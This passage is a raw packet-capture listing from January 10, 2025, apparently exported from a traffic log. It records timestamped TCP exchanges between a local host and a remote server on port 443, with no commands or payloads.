                                                                                                Jan 10, 2025 07:52:13.096822977 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.096829891 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.096860886 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.096878052 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.110364914 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.110430002 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.110445976 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.110455036 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.110486031 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.110515118 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.110905886 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.110961914 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.110980988 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.110987902 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.111011982 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.111022949 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.114170074 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.114232063 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.114250898 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.114283085 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.114346027 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.150396109 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.150425911 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.150461912 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.150479078 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.150505066 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.150526047 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.152268887 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.152292967 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.152331114 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.152337074 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.152364016 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.152378082 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.163235903 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.163259029 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.163300037 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.163311005 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.163336039 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.164817095 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.186309099 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.186340094 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.186387062 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.186397076 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.632164955 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.632220984 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.632246017 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.632265091 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.632299900 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.632309914 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.648607016 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.648653030 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.648673058 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.648680925 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.648698092 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.648716927 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.664308071 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.664351940 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.664376974 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.664385080 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.664421082 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.664421082 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.665113926 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.665164948 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.665189028 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.665196896 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.665220022 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.665240049 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.666184902 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.666229010 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.666258097 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.666268110 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.666291952 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.666311979 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.685440063 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.685484886 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.685523033 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.685529947 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.685558081 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.685569048 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.705267906 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.705342054 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.705357075 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.705372095 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.705401897 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.705410004 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.716728926 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.716787100 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.716820955 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.716830015 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.716857910 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.716873884 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.724735975 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.724781036 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.724843025 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.724854946 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.724864006 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.725117922 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.741187096 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.741238117 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.741261959 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.741271019 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.741297960 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.741307020 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.756906986 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.756953001 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.756980896 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.756990910 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.757010937 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.757030010 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.757613897 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.757657051 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.757673025 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.757693052 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.757704973 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.757730007 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.758357048 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.758399010 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.758439064 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.758445024 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.758476019 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.758486032 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.777861118 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.777906895 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.777941942 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.777951956 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.777976990 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.777997017 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.797765970 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.797782898 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.797827959 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.797837973 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.797858953 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.797885895 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.809000969 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.809015989 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.809071064 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.809078932 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.809098005 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.809112072 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.817193985 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.817212105 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.817264080 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.817274094 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.817305088 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.817323923 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.833834887 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.833849907 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.833901882 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.833909988 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.833949089 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.849318027 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.849361897 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.849391937 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.849401951 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.849422932 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.849443913 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.850147009 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.850191116 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.850210905 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.850225925 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.850249052 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.850265980 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.851129055 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.851174116 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.851198912 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.851205111 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.851233006 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.851249933 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.870440006 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.870491028 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.870516062 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.870524883 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.870553017 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.870567083 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.890247107 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.890290022 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.890316010 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.890324116 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.890352964 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.890372992 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.901696920 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.901743889 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.901765108 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.901772022 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.901798010 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.901813030 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.910001040 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.910046101 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.910080910 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.910088062 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.910101891 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.910125971 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.926456928 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.926501036 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.926522970 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.926531076 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.926561117 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.926580906 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.943418980 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.943494081 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.943511963 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.943521023 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.943547010 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.943567038 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.944345951 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.944395065 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.944412947 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.944421053 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.944447994 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.944463968 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.945292950 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.945338011 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.945365906 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.945373058 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.945400953 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.422441006 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.422496080 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.422542095 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.422548056 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.422662020 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.422662020 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.423438072 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.423492908 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.423544884 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.423564911 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.423585892 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.423681974 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.445805073 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.445867062 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.445916891 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.445924997 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.446130037 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.446130037 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.473529100 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.473604918 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.473656893 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.473664045 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.473757982 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.473757982 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.488914013 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.488967896 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.489135981 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.489135981 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.489142895 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.489206076 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.502763987 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.502789021 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.502861977 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.502868891 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.502887011 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.502912998 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.535929918 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.535955906 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.536084890 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.536094904 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.536281109 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.556302071 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.556324959 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.556495905 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.556507111 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.556566954 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.557400942 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.557442904 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.557480097 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.557487011 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.557512045 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.557534933 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.558258057 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.558300972 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.558341026 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.558346987 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.558389902 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.558389902 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.581073999 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.581147909 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.581732988 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.581732988 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.581743002 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.581876993 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.607911110 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.607934952 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.608328104 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.608328104 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.608346939 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.608412027 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.623497963 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.623519897 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.623716116 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.623727083 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.624207973 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.637895107 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.637912035 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.638690948 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.638690948 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.638700962 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.639342070 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.671390057 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.671411991 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.671924114 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.671924114 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.671936035 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.671998978 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.689426899 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.689446926 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.689539909 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.689553976 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.689615011 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.690217972 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.690233946 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.690325022 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.690330029 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.690505981 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.691870928 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.691941977 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.692151070 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.692151070 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.692166090 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.692219019 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.714015961 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.714066982 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.714113951 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.714122057 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.714176893 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.714176893 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.742816925 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.742862940 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.742949963 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.742958069 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.742981911 CET49751443192.168.2.947.79.66.76
